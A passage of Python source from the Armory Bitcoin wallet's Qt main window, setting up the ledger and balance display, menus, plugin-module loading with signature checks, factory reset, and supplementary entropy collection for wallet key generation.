self.lblBTC3 = QRichLabel('<b>BTC</b>', doWrap=False)
self.ttipTot = self.createToolTipWidget( \
'Funds if all current transactions are confirmed. '
'Value appears gray when it is the same as your spendable funds.')
self.ttipSpd = self.createToolTipWidget( 'Funds that can be spent <i>right now</i>')
self.ttipUcn = self.createToolTipWidget( \
'Funds that have less than 6 confirmations, and thus should not '
'be considered <i>yours</i>, yet.')
frmTotals = QFrame()
frmTotals.setFrameStyle(STYLE_NONE)
frmTotalsLayout = QGridLayout()
frmTotalsLayout.addWidget(self.lblTot, 0,0)
frmTotalsLayout.addWidget(self.lblSpd, 1,0)
frmTotalsLayout.addWidget(self.lblUcn, 2,0)
frmTotalsLayout.addWidget(self.lblTotalFunds, 0,1)
frmTotalsLayout.addWidget(self.lblSpendFunds, 1,1)
frmTotalsLayout.addWidget(self.lblUnconfFunds, 2,1)
frmTotalsLayout.addWidget(self.lblBTC1, 0,2)
frmTotalsLayout.addWidget(self.lblBTC2, 1,2)
frmTotalsLayout.addWidget(self.lblBTC3, 2,2)
frmTotalsLayout.addWidget(self.ttipTot, 0,3)
frmTotalsLayout.addWidget(self.ttipSpd, 1,3)
frmTotalsLayout.addWidget(self.ttipUcn, 2,3)
frmTotals.setLayout(frmTotalsLayout)
#page selection UI
self.mainLedgerCurrentPage = 1
self.lblPages = QRichLabel('Page: ')
self.PageLineEdit = QLineEdit('1')
self.lblNPages = QRichLabel(' out of 1')
self.connect(self.PageLineEdit, SIGNAL('editingFinished()'), \
self.loadNewPage)
self.changeWltFilter()
# Will fill this in when ledgers are created & combined
self.lblLedgShowing = QRichLabel('Showing:', hAlign=Qt.AlignHCenter)
self.lblLedgRange = QRichLabel('', hAlign=Qt.AlignHCenter)
self.lblLedgTotal = QRichLabel('', hAlign=Qt.AlignHCenter)
self.comboNumShow = QComboBox()
for s in self.numShowOpts:
self.comboNumShow.addItem( str(s) )
self.comboNumShow.setCurrentIndex(0)
self.comboNumShow.setMaximumWidth( tightSizeStr(self, '_9999_')[0]+25 )
self.btnLedgUp = QLabelButton('')
self.btnLedgUp.setMaximumHeight(20)
self.btnLedgUp.setPixmap(QPixmap(':/scroll_up_18.png'))
self.btnLedgUp.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.btnLedgUp.setVisible(False)
self.btnLedgDn = QLabelButton('')
self.btnLedgDn.setMaximumHeight(20)
self.btnLedgDn.setPixmap(QPixmap(':/scroll_down_18.png'))
self.btnLedgDn.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.connect(self.comboNumShow, SIGNAL('activated(int)'), self.changeNumShow)
self.connect(self.btnLedgUp, SIGNAL('clicked()'), self.clickLedgUp)
self.connect(self.btnLedgDn, SIGNAL('clicked()'), self.clickLedgDn)
frmFilter = makeVertFrame([QLabel(tr('Filter:')), self.comboWltSelect, 'Stretch'])
frmLower = makeHorizFrame([ frmFilter, \
'Stretch', \
self.frmLedgUpDown, \
'Stretch', \
frmTotals])
# Now add the ledger to the bottom of the window
ledgLayout = QGridLayout()
ledgLayout.addWidget(self.ledgerView, 1,0)
ledgLayout.addWidget(frmLower, 2,0)
ledgLayout.setRowStretch(0, 0)
ledgLayout.setRowStretch(1, 1)
ledgLayout.setRowStretch(2, 0)
self.tabActivity = QWidget()
self.tabActivity.setLayout(ledgLayout)
self.tabAnnounce = QWidget()
self.setupAnnounceTab()
# Add the available tabs to the main tab widget
self.MAINTABS = enum('Dash','Ledger','Announce')
self.mainDisplayTabs.addTab(self.tabDashboard, tr('Dashboard'))
self.mainDisplayTabs.addTab(self.tabActivity, tr('Transactions'))
self.mainDisplayTabs.addTab(self.tabAnnounce, tr('Announcements'))
##########################################################################
if not CLI_OPTIONS.disableModules:
if USE_TESTNET:
self.loadArmoryModulesNoZip()
# Armory modules are disabled on mainnet. If enabled, they are loaded
# from zip files that contain the module code.
# else:
# self.loadArmoryModules()
##########################################################################
self.lbDialog = None
btnSendBtc = QPushButton(tr("Send Bitcoins"))
btnRecvBtc = QPushButton(tr("Receive Bitcoins"))
btnWltProps = QPushButton(tr("Wallet Properties"))
btnOfflineTx = QPushButton(tr("Offline Transactions"))
btnMultisig = QPushButton(tr("Lockboxes (Multi-Sig)"))
self.connect(btnWltProps, SIGNAL('clicked()'), self.execDlgWalletDetails)
self.connect(btnRecvBtc, SIGNAL('clicked()'), self.clickReceiveCoins)
self.connect(btnSendBtc, SIGNAL('clicked()'), self.clickSendBitcoins)
self.connect(btnOfflineTx,SIGNAL('clicked()'), self.execOfflineTx)
self.connect(btnMultisig, SIGNAL('clicked()'), self.browseLockboxes)
verStr = 'Armory %s / %s' % (getVersionString(BTCARMORY_VERSION),
UserModeStr(self.usermode))
lblInfo = QRichLabel(verStr, doWrap=False)
lblInfo.setFont(GETFONT('var',10))
lblInfo.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
logoBtnFrame = []
logoBtnFrame.append(self.lblLogoIcon)
logoBtnFrame.append(btnSendBtc)
logoBtnFrame.append(btnRecvBtc)
logoBtnFrame.append(btnWltProps)
if self.usermode in (USERMODE.Advanced, USERMODE.Expert):
logoBtnFrame.append(btnOfflineTx)
if self.usermode in (USERMODE.Expert,):
logoBtnFrame.append(btnMultisig)
logoBtnFrame.append(lblInfo)
logoBtnFrame.append('Stretch')
btnFrame = makeVertFrame(logoBtnFrame, STYLE_SUNKEN)
logoWidth=220
btnFrame.sizeHint = lambda: QSize(logoWidth*1.0, 10)
btnFrame.setMaximumWidth(logoWidth*1.2)
btnFrame.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
layout = QGridLayout()
layout.addWidget(btnFrame, 0, 0, 1, 1)
layout.addWidget(wltFrame, 0, 1, 1, 1)
layout.addWidget(self.mainDisplayTabs, 1, 0, 1, 2)
layout.setRowStretch(0, 1)
layout.setRowStretch(1, 5)
# Attach the layout to the frame that will become the central widget
mainFrame = QFrame()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
self.setMinimumSize(750,500)
# Start the user at the dashboard
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
##########################################################################
# Set up menu and actions
#MENUS = enum('File', 'Wallet', 'User', "Tools", "Network")
currmode = self.getSettingOrSetDefault('User_Mode', 'Advanced')
MENUS = enum('File', 'User', 'Tools', 'Addresses', 'Wallets', \
'MultiSig', 'Help')
self.menu = self.menuBar()
self.menusList = []
self.menusList.append( self.menu.addMenu(tr('&File')) )
self.menusList.append( self.menu.addMenu(tr('&User')) )
self.menusList.append( self.menu.addMenu(tr('&Tools')) )
self.menusList.append( self.menu.addMenu(tr('&Addresses')) )
self.menusList.append( self.menu.addMenu(tr('&Wallets')) )
self.menusList.append( self.menu.addMenu(tr('&MultiSig')) )
self.menusList.append( self.menu.addMenu(tr('&Help')) )
#self.menusList.append( self.menu.addMenu('&Network') )
def exportTx():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, 'Transactions Unavailable', \
'Transaction history cannot be collected until Armory is '
'in online mode. Please try again when Armory is online. ',
QMessageBox.Ok)
return
else:
DlgExportTxHistory(self,self).exec_()
actExportTx = self.createAction('&Export Transactions...', exportTx)
actSettings = self.createAction('&Settings...', self.openSettings)
actMinimApp = self.createAction('&Minimize Armory', self.minimizeArmory)
actExportLog = self.createAction('Export &Log File...', self.exportLogFile)
actCloseApp = self.createAction('&Quit Armory', self.closeForReal)
self.menusList[MENUS.File].addAction(actExportTx)
self.menusList[MENUS.File].addAction(actSettings)
self.menusList[MENUS.File].addAction(actMinimApp)
self.menusList[MENUS.File].addAction(actExportLog)
self.menusList[MENUS.File].addAction(actCloseApp)
def chngStd(b):
if b: self.setUserMode(USERMODE.Standard)
def chngAdv(b):
if b: self.setUserMode(USERMODE.Advanced)
def chngDev(b):
if b: self.setUserMode(USERMODE.Expert)
modeActGrp = QActionGroup(self)
actSetModeStd = self.createAction('&Standard', chngStd, True)
actSetModeAdv = self.createAction('&Advanced', chngAdv, True)
actSetModeDev = self.createAction('&Expert', chngDev, True)
modeActGrp.addAction(actSetModeStd)
modeActGrp.addAction(actSetModeAdv)
modeActGrp.addAction(actSetModeDev)
self.menusList[MENUS.User].addAction(actSetModeStd)
self.menusList[MENUS.User].addAction(actSetModeAdv)
self.menusList[MENUS.User].addAction(actSetModeDev)
LOGINFO('Usermode: %s', currmode)
self.firstModeSwitch=True
if currmode=='Standard':
self.usermode = USERMODE.Standard
actSetModeStd.setChecked(True)
elif currmode=='Advanced':
self.usermode = USERMODE.Advanced
actSetModeAdv.setChecked(True)
elif currmode=='Expert':
self.usermode = USERMODE.Expert
actSetModeDev.setChecked(True)
def openMsgSigning():
MessageSigningVerificationDialog(self,self).exec_()
def openBlindBroad():
if not satoshiIsAvailable():
QMessageBox.warning(self, tr("Not Online"), tr("""
Bitcoin Core is not available, so Armory will not be able
to broadcast any transactions for you."""), QMessageBox.Ok)
return
DlgBroadcastBlindTx(self,self).exec_()
actOpenSigner = self.createAction('&Message Signing/Verification...', openMsgSigning)
if currmode=='Expert':
actOpenTools = self.createAction('&EC Calculator...', lambda: DlgECDSACalc(self,self, 1).exec_())
actBlindBroad = self.createAction('&Broadcast Raw Transaction...', openBlindBroad)
self.menusList[MENUS.Tools].addAction(actOpenSigner)
if currmode=='Expert':
self.menusList[MENUS.Tools].addAction(actOpenTools)
self.menusList[MENUS.Tools].addAction(actBlindBroad)
def mkprom():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, tr('Offline'), tr("""
Armory is currently offline, and cannot determine what funds are
available for simulfunding. Please try again when Armory is in
online mode."""), QMessageBox.Ok)
else:
DlgCreatePromNote(self, self).exec_()
def msrevsign():
title = tr('Import Multi-Spend Transaction')
descr = tr("""
Import a signature-collector text block for review and signing.
It is usually a block of text with "TXSIGCOLLECT" in the first line,
or a <i>*.sigcollect.tx</i> file.""")
ftypes = ['Signature Collectors (*.sigcollect.tx)']
dlgImport = DlgImportAsciiBlock(self, self, title, descr, ftypes,
UnsignedTransaction)
dlgImport.exec_()
if dlgImport.returnObj:
DlgMultiSpendReview(self, self, dlgImport.returnObj).exec_()
simulMerge = lambda: DlgMergePromNotes(self, self).exec_()
actMakeProm = self.createAction('Simulfund &Promissory Note', mkprom)
actPromCollect = self.createAction('Simulfund &Collect && Merge', simulMerge)
actMultiSpend = self.createAction('Simulfund &Review && Sign', msrevsign)
if not self.usermode==USERMODE.Expert:
self.menusList[MENUS.MultiSig].menuAction().setVisible(False)
# Addresses
actAddrBook = self.createAction('View &Address Book...', self.execAddressBook)
actSweepKey = self.createAction('&Sweep Private Key/Address...', self.menuSelectSweepKey)
actImportKey = self.createAction('&Import Private Key/Address...', self.menuSelectImportKey)
self.menusList[MENUS.Addresses].addAction(actAddrBook)
if not currmode=='Standard':
self.menusList[MENUS.Addresses].addAction(actImportKey)
self.menusList[MENUS.Addresses].addAction(actSweepKey)
actCreateNew = self.createAction('&Create New Wallet', self.startWalletWizard)
actImportWlt = self.createAction('&Import or Restore Wallet', self.execImportWallet)
actAddressBook = self.createAction('View &Address Book', self.execAddressBook)
actRecoverWlt = self.createAction('&Fix Damaged Wallet', self.RecoverWallet)
self.menusList[MENUS.Wallets].addAction(actCreateNew)
self.menusList[MENUS.Wallets].addAction(actImportWlt)
self.menusList[MENUS.Wallets].addSeparator()
self.menusList[MENUS.Wallets].addAction(actRecoverWlt)
def execVersion():
self.explicitCheckAnnouncements()
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Announce)
execAbout = lambda: DlgHelpAbout(self).exec_()
execTrouble = lambda: webbrowser.open('https://bitcoinarmory.com/troubleshooting/')
execBugReport = lambda: DlgBugReport(self, self).exec_()
execVerifySigned = lambda: VerifyOfflinePackageDialog(self, self).exec_()
actAboutWindow = self.createAction(tr('&About Armory...'), execAbout)
actVersionCheck = self.createAction(tr('Armory Version'), execVersion)
actDownloadUpgrade = self.createAction(tr('Update Software...'), self.openDownloaderAll)
actVerifySigned = self.createAction(tr('Verify Signed Package...'), execVerifySigned)
actTroubleshoot = self.createAction(tr('Troubleshooting Armory'), execTrouble)
actSubmitBug = self.createAction(tr('Submit Bug Report'), execBugReport)
actClearMemPool = self.createAction(tr('Clear All Unconfirmed'), self.clearMemoryPool)
actRescanDB = self.createAction(tr('Rescan Databases'), self.rescanNextLoad)
actRebuildDB = self.createAction(tr('Rebuild and Rescan Databases'), self.rebuildNextLoad)
actFactoryReset = self.createAction(tr('Factory Reset'), self.factoryReset)
actPrivacyPolicy = self.createAction(tr('Armory Privacy Policy'), self.showPrivacyGeneric)
self.menusList[MENUS.Help].addAction(actAboutWindow)
self.menusList[MENUS.Help].addAction(actVersionCheck)
self.menusList[MENUS.Help].addAction(actDownloadUpgrade)
self.menusList[MENUS.Help].addAction(actVerifySigned)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actTroubleshoot)
self.menusList[MENUS.Help].addAction(actSubmitBug)
self.menusList[MENUS.Help].addAction(actPrivacyPolicy)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actClearMemPool)
self.menusList[MENUS.Help].addAction(actRescanDB)
self.menusList[MENUS.Help].addAction(actRebuildDB)
self.menusList[MENUS.Help].addAction(actFactoryReset)
execMSHack = lambda: DlgSelectMultiSigOption(self,self).exec_()
execBrowse = lambda: DlgLockboxManager(self,self).exec_()
actMultiHacker = self.createAction(tr('Multi-Sig Lockboxes'), execMSHack)
actBrowseLockboxes = self.createAction(tr('Lockbox &Manager...'), execBrowse)
#self.menusList[MENUS.MultiSig].addAction(actMultiHacker)
self.menusList[MENUS.MultiSig].addAction(actBrowseLockboxes)
self.menusList[MENUS.MultiSig].addAction(actMakeProm)
self.menusList[MENUS.MultiSig].addAction(actPromCollect)
self.menusList[MENUS.MultiSig].addAction(actMultiSpend)
# Restore any main-window geometry saved in the settings file
hexgeom = self.settings.get('MainGeometry')
hexledgsz = self.settings.get('MainLedgerCols')
hexwltsz = self.settings.get('MainWalletCols')
if len(hexgeom)>0:
geom = QByteArray.fromHex(hexgeom)
self.restoreGeometry(geom)
if len(hexwltsz)>0:
restoreTableView(self.walletsView, hexwltsz)
if len(hexledgsz)>0:
restoreTableView(self.ledgerView, hexledgsz)
self.ledgerView.setColumnWidth(LEDGERCOLS.NumConf, 20)
self.ledgerView.setColumnWidth(LEDGERCOLS.TxDir, 72)
if DO_WALLET_CHECK:
self.checkWallets()
self.blkReceived = RightNow()
self.setDashboardDetails()
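# Defer the intro dialog and the first heartbeat until the Twisted reactor
# is running; Armory drives Qt and its networking from one event loop.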
from twisted.internet import reactor
reactor.callLater(0.1, self.execIntroDialog)
reactor.callLater(1, self.Heartbeat)
if self.getSettingOrSetDefault('MinimizeOnOpen', False) and not CLI_ARGS:
LOGINFO('MinimizeOnOpen is True')
reactor.callLater(0, self.minimizeArmory)
if CLI_ARGS:
reactor.callLater(1, self.uriLinkClicked, CLI_ARGS[0])
if OS_MACOSX:
self.macNotifHdlr = ArmoryMac.MacNotificationHandler()
if self.macNotifHdlr.hasUserNotificationCenterSupport():
self.notifCtr = ArmoryMac.MacNotificationHandler.BuiltIn
else:
# In theory, Qt can support notifications via Growl on pre-10.8
# machines. It's shaky as hell, though, so we'll rely on alternate
# code for now. In the future, according to
# https://bugreports.qt-project.org/browse/QTBUG-33733 (which may not
# be accurate, as the official documentation is contradictory),
# showMessage() may have direct support for the OS X notification
# center in Qt5.1. Something to experiment with later....
self.notifCtr = self.macNotifHdlr.hasGrowl()
# Now that construction of the UI is done
# Check for warnings to be displayed
# This is true if and only if the command line has a data dir that doesn't exist
# and can't be created.
if not CLI_OPTIONS.datadir in [ARMORY_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, tr('Default Data Directory'), tr("""
Armory is using the default data directory because
the data directory specified on the command line could
not be found and could not be created."""), QMessageBox.Ok)
# This is true if and only if the command line has a database dir that doesn't exist
# and can't be created.
elif not CLI_OPTIONS.armoryDBDir in [ARMORY_DB_DIR, DEFAULT]:
QMessageBox.warning(self, tr('Default Database Directory'), tr("""
Armory is using the default database directory because
the database directory specified on the command line could
not be found and could not be created."""), QMessageBox.Ok)
# This is true if and only if the command line has a bitcoin dir that doesn't exist
if not CLI_OPTIONS.satoshiHome in [BTC_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, tr('Bitcoin Directory'), tr("""
Armory is using the default Bitcoin directory because
the Bitcoin directory specified on the command line could
not be found."""), QMessageBox.Ok)
if not self.getSettingOrSetDefault('DNAA_DeleteLevelDB', False) and \
os.path.exists(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA)):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, 'Delete Old DB Directory', \
'Armory detected an older version of the database. '
'Do you want to delete the old database? Choose yes if '
'you do not think that you will revert to an older version of Armory.', 'Do not ask this question again')
if reply[0]==True:
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA))
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_HEADERS))
if reply[1]==True:
self.writeSetting('DNAA_DeleteLevelDB', True)
####################################################
def getWatchingOnlyWallets(self):
result = []
for wltID in self.walletIDList:
if self.walletMap[wltID].watchingOnly:
result.append(wltID)
return result
####################################################
def changeWltFilter(self):
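# Combo-box layout (inferred from the offsets below): entries 0-3 are the
# fixed filters, 4 is the "Custom Filter" entry, and individual wallets
# start at index 7 -- hence the currIdx-7 mapping.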
currIdx = max(self.comboWltSelect.currentIndex(), 0)
currText = str(self.comboWltSelect.currentText()).lower()
if currText.lower().startswith('custom filter'):
self.walletsView.showColumn(0)
#self.walletsView.resizeColumnToContents(0)
else:
self.walletsView.hideColumn(0)
if currIdx != 4:
for i in range(0, len(self.walletVisibleList)):
self.walletVisibleList[i] = False
# If a specific wallet is selected, just set that and you're done
if currIdx > 4:
self.walletVisibleList[currIdx-7] = True
self.setWltSetting(self.walletIDList[currIdx-7], 'LedgerShow', True)
else:
# Else we walk through the wallets and flag the particular ones
typelist = [[wid, determineWalletType(self.walletMap[wid], self)[0]] \
for wid in self.walletIDList]
for i,winfo in enumerate(typelist):
wid,wtype = winfo[:]
if currIdx==0:
# My wallets
doShow = wtype in [WLTTYPES.Offline,WLTTYPES.Crypt,WLTTYPES.Plain]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==1:
# Offline wallets
doShow = winfo[1] in [WLTTYPES.Offline]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==2:
# Others' Wallets
doShow = winfo[1] in [WLTTYPES.WatchOnly]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==3:
# All Wallets
self.walletVisibleList[i] = True
self.setWltSetting(wid, 'LedgerShow', True)
self.mainLedgerCurrentPage = 1
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
self.wltIDList = []
for i,vis in enumerate(self.walletVisibleList):
if vis:
wltid = self.walletIDList[i]
if self.walletMap[wltid].isEnabled:
self.wltIDList.append(wltid)
try:
TheBDM.bdv().updateWalletsLedgerFilter(self.wltIDList)
except:
pass
############################################################################
def loadArmoryModulesNoZip(self):
"""
This method checks for any .py files in the exec directory
"""
moduleDir = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if not moduleDir or not os.path.exists(moduleDir):
return
LOGWARN('Attempting to load modules from: %s' % MODULES_ZIP_DIR_NAME)
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleListNoZip(moduleDir)
for moduleName,infoMap in modMap.iteritems():
module = dynamicImportNoZip(moduleDir, moduleName, globals())
plugObj = module.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critical(self, tr("Bad Module"), tr("""
The module you attempted to load (%s) is malformed. It is
missing attributes that are needed for Armory to load it.
It will be skipped.""") % moduleName, QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, tr("Outdated Module"), tr("""
Module "%s" is only specified to work up to Armory version %s.
You are using Armory version %s. Please remove the module if
you experience any problems with it, or contact the maintainer
for a new version.
<br><br>
Do you want to continue loading the module?"""),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra hook methods the plugin provides
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def loadArmoryModules(self):
"""
This method checks for any .zip files in the modules directory
"""
modulesZipDirPath = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if modulesZipDirPath and os.path.exists(modulesZipDirPath):
self.tempModulesDirName = tempfile.mkdtemp('modules')
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleList(modulesZipDirPath)
for moduleName,infoMap in modMap.iteritems():
moduleZipPath = os.path.join(modulesZipDirPath, infoMap[MODULE_PATH_KEY])
if infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Invalid:
reply = QMessageBox.warning(self, tr("Invalid Module"), tr("""
Armory detected the following module which is
<font color="%(color)s"><b>invalid</b></font>:
<br><br>
<b>Module Name:</b> %(name)s<br>
<b>Module Path:</b> %(path)s<br>
<br><br>
Armory will only run a module from a zip file that
has the required structure.""") % \
{ 'color' : htmlColor('TextRed'), 'name' : moduleName, 'path' : moduleZipPath}, QMessageBox.Ok)
elif not USE_TESTNET and infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Unsigned:
reply = QMessageBox.warning(self, tr("UNSIGNED Module"), tr("""
Armory detected the following module which
<font color="%(color)s"><b>has not been signed by Armory</b></font> and may be dangerous:
<br><br>
<b>Module Name:</b> %(name)s<br>
<b>Module Path:</b> %(path)s<br>
<br><br>
Armory will not allow you to run this module.""") % \
{ 'color' : htmlColor('TextRed'), 'name' : moduleName, 'path' : moduleZipPath}, QMessageBox.Ok)
else:
ZipFile(moduleZipPath).extract(INNER_ZIP_FILENAME, self.tempModulesDirName)
ZipFile(os.path.join(self.tempModulesDirName,INNER_ZIP_FILENAME)).extractall(self.tempModulesDirName)
plugin = importModule(self.tempModulesDirName, moduleName, globals())
plugObj = plugin.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critical(self, tr("Bad Module"), tr("""
The module you attempted to load (%s) is malformed. It is
missing attributes that are needed for Armory to load it.
It will be skipped.""") % moduleName, QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, tr("Outdated Module"), tr("""
Module %(mod)s is only specified to work up to Armory version %(maxver)s.
You are using Armory version %(curver)s. Please remove the module if
you experience any problems with it, or contact the maintainer
for a new version.
<br><br>
Do you want to continue loading the module?""") \
% { 'mod' : moduleName, 'maxver' : plugObj.maxVersion,
'curver' : getVersionString(BTCARMORY_VERSION)} ,
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra hook methods the plugin provides
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def factoryReset(self):
"""
reply = QMessageBox.information(self,'Factory Reset', \
'You are about to revert all Armory settings '
'to the state they were in when Armory was first installed. '
'<br><br>'
'If you click "Yes," Armory will exit after settings are '
'reverted. You will have to manually start Armory again.'
'<br><br>'
'Do you want to continue? ', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.removeSettingsOnClose = True
self.closeForReal()
"""
if DlgFactoryReset(self,self).exec_():
# The dialog already wrote all the flag files, just close now
self.closeForReal()
####################################################
def showPrivacyGeneric(self):
DlgPrivacyPolicy().exec_()
####################################################
def clearMemoryPool(self):
touchFile( os.path.join(ARMORY_HOME_DIR, 'clearmempool.flag') )
msg = tr("""
The next time you restart Armory, all unconfirmed transactions will
be cleared allowing you to retry any stuck transactions.""")
if not self.doAutoBitcoind:
msg += tr("""
<br><br>Make sure you also restart Bitcoin-Qt
(or bitcoind) and let it synchronize again before you restart
Armory. Doing so will clear its memory pool, as well""")
QMessageBox.information(self, tr('Memory Pool'), msg, QMessageBox.Ok)
####################################################
def registerWidgetActivateTime(self, widget):
# This is a bit of a hack, but it's a very isolated method to make
# it easy to link widgets to my entropy accumulator
# I just realized this doesn't do exactly what I originally intended...
# I wanted it to work on arbitrary widgets like QLineEdits, but using
# super is not the answer. What I want is the original class method
# to be called after logging keypress, not its superclass method.
# Nonetheless, it does do what I need it to, as long as you only
# register frames and dialogs, not individual widgets/controls.
mainWindow = self
def newKPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyPressEvent(event)
def newKRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyReleaseEvent(event)
def newMPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mousePressEvent(event)
def newMRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mouseReleaseEvent(event)
from types import MethodType
widget.keyPressEvent = MethodType(newKPE, widget)
widget.keyReleaseEvent = MethodType(newKRE, widget)
widget.mousePressEvent = MethodType(newMPE, widget)
widget.mouseReleaseEvent = MethodType(newMRE, widget)
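# Usage sketch (hypothetical dialog name): feed a dialog's key/mouse
# events into the entropy pool with:
#   self.registerWidgetActivateTime(dlgNewWallet)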
####################################################
def logEntropy(self):
try:
self.entropyAccum.append(RightNow())
self.entropyAccum.append(QCursor.pos().x())
self.entropyAccum.append(QCursor.pos().y())
except:
LOGEXCEPT('Error logging keypress entropy')
####################################################
def getExtraEntropyForKeyGen(self):
# The entropyAccum var has all the timestamps, down to the microsecond,
# of every keypress and mouseclick made during the wallet creation
# wizard. Also logs mouse positions on every press, though it will
# be constant while typing. Either way, even if they change no text
# and use a 5-char password, we will still pick up about 40 events.
# Then we throw in the [name,time,size] triplets of some volatile
# system directories, and the hash of a file in that directory that
# is expected to have timestamps and system-dependent parameters.
# Finally, take a desktop screenshot...
# All three of these sources are likely to have sufficient entropy alone.
source1,self.entropyAccum = self.entropyAccum,[]
if len(source1)==0:
LOGERROR('Error getting extra entropy from mouse & key presses')
source2 = []
try:
if OS_WINDOWS:
tempDir = os.getenv('TEMP')
extraFiles = []
elif OS_LINUX:
tempDir = '/var/log'
extraFiles = ['/var/log/Xorg.0.log']
elif OS_MACOSX:
tempDir = '/var/log'
extraFiles = ['/var/log/system.log']
# A simple listing of the directory files, sizes and times is good
if os.path.exists(tempDir):
for fname in os.listdir(tempDir):
fullpath = os.path.join(tempDir, fname)
sz = os.path.getsize(fullpath)
tm = os.path.getmtime(fullpath)
source2.append([fname, sz, tm])
# On Linux we also throw in Xorg.0.log
for f in extraFiles:
if os.path.exists(f):
with open(f,'rb') as infile:
source2.append(hash256(infile.read()))
if len(source2)==0:
LOGWARN('Second source of supplemental entropy will be empty')
except:
LOGEXCEPT('Error getting extra entropy from filesystem')
source3 = ''
try:
pixDesk = QPixmap.grabWindow(QApplication.desktop().winId())
pixRaw = QByteArray()
pixBuf = QBuffer(pixRaw)
pixBuf.open(QIODevice.WriteOnly)
pixDesk.save(pixBuf, 'PNG')
source3 = pixBuf.buffer().toHex()
except:
LOGEXCEPT('Third source of entropy (desktop screenshot) failed')
if len(source3)==0:
LOGWARN('Error getting extra entropy from screenshot')
LOGINFO('Adding %d keypress events to the entropy pool', len(source1)/3)
LOGINFO('Adding %s bytes of filesystem data to the entropy pool',
bytesToHumanSize(len(str(source2))))
LOGINFO('Adding %s bytes from desktop screenshot to the entropy pool',
bytesToHumanSize(len(str(source3))/2))
